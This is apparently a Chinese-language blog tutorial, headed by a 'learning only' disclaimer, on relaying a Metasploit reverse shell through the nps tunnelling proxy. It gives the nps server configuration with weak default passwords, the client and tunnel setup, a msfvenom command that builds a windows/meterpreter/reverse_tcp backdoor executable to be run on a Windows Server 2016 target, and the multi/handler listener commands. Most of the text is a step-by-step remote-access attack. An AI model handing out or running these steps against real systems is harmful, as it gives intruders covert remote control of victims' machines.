免责声明:本文仅做技术交流与学习...
目录
Nps项目:
一图通解:
1-下载nps/npc
2-服务端启动
访问web网页:
添加客户端,生成密匙.
3-kali客户端连接服务端
4-添加协议隧道.
5-kali生成后门:
6-kali创建监听:
Nps项目:
https://github.com/ehang-io/nps
nps一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、3sh访问、远程桌面,内网ns解析等等.),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
(内网穿透+隧道)nb啊
一图通解:
1-下载nps/npc
https://github.com/ehang-io/nps
--下载Linux版本的.
--分别上传到kali上和服务器上.--解压.
2-服务端启动
./nps install
./nps(端口占用的话自己关或修改配置文件)
nps:
appname = nps
#Boot mode(dev|pro)
runmode = dev#HTTP(S) proxy port, no startup if empty
http_proxy_ip=0.0.0.0
http_proxy_port=80 8082
https_proxy_port=443 ///433
https_just_proxy=true
#default https certificate setting
https_default_cert_file=conf/server.pem
https_default_key_file=conf/server.key##bridge
bridge_type=tcp
bridge_port=8024 //8025
bridge_ip=0.0.0.0# Public password, which clients can use to connect to the server
# After the connection, the server will be able to open relevant ports and parse related domain names according to its own configuration file.
public_vkey=123#Traffic data persistence interval(minute)
#Ignorance means no persistence
#flow_store_interval=1# log level LevelEmergency->0 LevelAlert->1 LevelCritical->2 LevelError->3 LevelWarning->4 LevelNotice->5 LevelInformational->6 LevelDebug->7
log_level=7
#log_path=nps.log#Whether to restrict IP access, true or false or ignore
#ip_limit=true#p2p
#p2p_ip=127.0.0.1
#p2p_port=6000#web
web_host=a.o.com
web_username=admin
web_password=123
web_port = 8080 ///8085
web_ip=0.0.0.0
web_base_url=
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key
# if web under proxy use sub path. like http://host/nps need this.
#web_base_url=/nps#Web API unauthenticated IP address(the len of auth_crypt_key must be 16)
#Remove comments if needed
#auth_key=test
auth_crypt_key =1234567812345678#allow_ports=9001-9009,10001,11000-12000#Web management multi-user login
allow_user_login=false
allow_user_register=false
allow_user_change_username=false#extension
allow_flow_limit=false
allow_rate_limit=false
allow_tunnel_num_limit=false
allow_local_proxy=false
allow_connection_num_limit=false
allow_multi_ip=false
system_info_display=false#cache
http_cache=false
http_cache_length=100#get origin ip
http_add_origin_header=false#pprof debug options
#pprof_ip=0.0.0.0
#pprof_port=9999#client disconnect timeout
disconnect_timeout=60
访问web网页:
http://服务端IP:8085/
admin/123 --默认账号密码登录
添加客户端,生成密匙.
--添加上kali的客户端.
3-kali客户端连接服务端
./npc -server=服务端IP:8025 -vkey=密匙
4-添加协议隧道.
--tcp
--绑定指向远程绑定5555,指向本地的6666.
5-kali生成后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=5555 -f exe -o nps.exe
--马子上传到windows server 2016上--执行--上线.
6-kali创建监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
kali先与服务器建立好隧道.
靶机的流量会先交给服务器,
服务器通过隧道再将流量交给kali.
5555-->6666-->6666-->kali的某个端口